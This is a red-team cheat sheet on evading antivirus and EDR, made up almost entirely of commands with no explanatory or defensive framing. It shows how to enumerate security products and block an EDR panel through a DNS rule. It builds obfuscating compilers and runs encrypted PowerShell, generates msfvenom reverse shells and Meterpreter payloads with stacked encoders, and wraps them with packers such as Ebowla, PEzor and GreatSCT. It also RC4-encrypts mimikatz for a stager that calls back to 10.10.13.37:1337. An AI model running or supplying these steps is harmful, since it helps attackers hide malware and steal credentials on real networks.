AV / EDR Evasion

Cmd > WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
PS > Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
PS > gc .\100-hosts.txt | % {gwmi -Query "select * from Win32_Process" -ComputerName $_ | ? {$_.Caption -in "MsMpEng.exe"} | select ProcessName,PSComputerName}

PS > cd C:\Windows\Microsoft.NET\Framework64\
PS > ls
PS > cd .\v4.0.30319\
PS > Get-Item .\clr.dll | Fl
Or
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item .\clr.dll)).FileVersion

PS > Get-ItemProperty "HKLM:SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -Name Release

PS > Add-DnsClientNrptRule -Namespace "web-panel.edr.megacorp.local" -NameServers 127.0.0.1 -Comment "MegaCorp EDR Web Panel"
PS > Clear-DnsClientCache -Confirm:$false

PS > Get-DnsClientNrptRule -Namespace "web-panel.edr.megacorp.local" | Remove-DnsClientNrptRule -PassThru -Confirm:$false -Force

apk update
apk add --no-cache build-base cmake git python3 mingw-w64-gcc
rm -rf /var/cache/apk/*
git clone --depth=1 -b llvm-13.x --single-branch https://github.com/heroims/obfuscator /opt/ollvm
cd /opt/ollvm
wget https://github.com/llvm/llvm-project/commit/ff1681ddb303223973653f7f5f3f3435b48a1983.patch
patch llvm/include/llvm/Support/Signals.h < ff1681ddb303223973653f7f5f3f3435b48a1983.patch
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_ENABLE_NEW_PASS_MANAGER=OFF ../llvm
sed -i 's/LLVM_TOOL_CLANG_BUILD:BOOL=OFF/LLVM_TOOL_CLANG_BUILD:BOOL=ON/g' CMakeCache.txt
sed -i "s|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=`realpath ../clang`|g" CMakeCache.txt
make -j7
make install
git clone --depth=1 https://github.com/tpoechtrager/wclang /opt/wclang
cd /opt/wclang
cmake .
make -j7
make install
rm -rf /opt/ollvm /opt/wclang && mkdir /build

PS > curl https://download.savannah.gnu.org/releases/tinycc/tcc-0.9.27-win64-bin.zip -o tcc.zip
PS > Expand-Archive .\tcc.zip -DestinationPath .
PS > rm tcc.zip; cd tcc
PS > curl https://github.com/DosX-dev/obfus.h/raw/refs/heads/main/include/obfus.h -o obfus.h
PS > curl https://download.savannah.gnu.org/releases/tinycc/winapi-full-for-0.9.27.zip -o tcc-winapi.zip
PS > Expand-Archive .\tcc-winapi.zip -DestinationPath .
PS > rm tcc-winapi.zip
PS > Copy-Item -Path .\winapi-full-for-0.9.27\include\* -Destination .\include\ -Recurse -Force
PS > .\tcc.exe -w -DVIRT -DCFLOW_V2 -DANTIDEBUG_V2 -o msgbox.exe msgbox.c -luser32

PS > Out-EncryptedScript .\script.ps1 $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) s4lt -FilePath .\evil.ps1
PS > . .\evil.ps1
PS > $dec = de "Passw0rd!" s4lt
PS > Invoke-Expression $dec

PS > git clone https://github.com/cfalta/PowerShellArmoury
PS > cd PowerShellArmoury
PS > curl https://github.com/snovvcrash/WeaponizeKali.sh/raw/main/conf/PSArmoury.json -o PSArmoury.json
PS > . .\New-PSArmoury.ps1
PS > New-PSArmoury -ValidateOnly -Config PSArmoury.json
PS > New-PSArmoury -Path armored.ps1 -Config PSArmoury.json
PS > cat -raw .\armored.ps1 | iex

$ msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -a x86 --platform win -e x86/shikata_ga_nai -i 3 -f exe -o rev.exe
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -k -f exe -o met.exe

$ wine hyperion.exe input.exe output.exe
$ wine PEScrambler.exe -i input.exe -o output.exe

$ git clone https://github.com/GreatSCT/GreatSCT ~/tools/GreatSCT
$ cd ~/tools/GreatSCT/setup
$ ./setup.sh
$ cd .. && ./GreatSCT.py
...generate a payload...
$ ls -la /usr/share/greatsct-output/handlers/payload.{rc,xml}

$ msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

PS > cmd /c C:\Windows\Microsoft.NET\framework\v4.0.30319\msbuild.exe payload.xml

$ git clone https://github.com/Genetic-Malware/Ebowla ~/tools/Ebowla && cd ~/tools/Ebowla
$ sudo apt install golang mingw-w64 wine python-dev -y
$ sudo python -m pip install configobj pyparsing pycrypto pyinstaller
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.13.37 LPORT=1337 --platform win -f exe -a x64 -o rev.exe
$ vi genetic.config
...Edit output_type, payload_type, clean_output, [[ENV_VAR]]...
$ python ebowla.py rev.exe genetic.config && rm rev.exe
$ ./build_x64_go.sh output/go_symmetric_rev.exe.go ebowla-rev.exe [--hidden] && rm output/go_symmetric_rev.exe.go
[+] output/ebowla-rev.exe

$ bash PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=10 evil.exe -z 2

$ sudo apt install 'mingw-w64*' -y
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f raw > beacon.bin
$ python charlotte.py
Cmd > rundll32.exe charlotte.dll, <XOR_KEY>

$ sudo ./MeterPwrShell2Kalix64 -c noaptupdate

$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv && cd stager_libpeconv
$ openssl enc -rc4 -in mimikatz.exe -K `echo -n '1234567890123456' | xxd -p` -nosalt -out mimikatz.rc4
$ make stager IMPLANT_IP=10.10.13.37 IMPLANT_PORT=1337 RC4_KEY=1234567890123456
$ ./socket_binary_server.py mimikatz.rc4 10.10.13.37 1337
Cmd > dist\stager.exe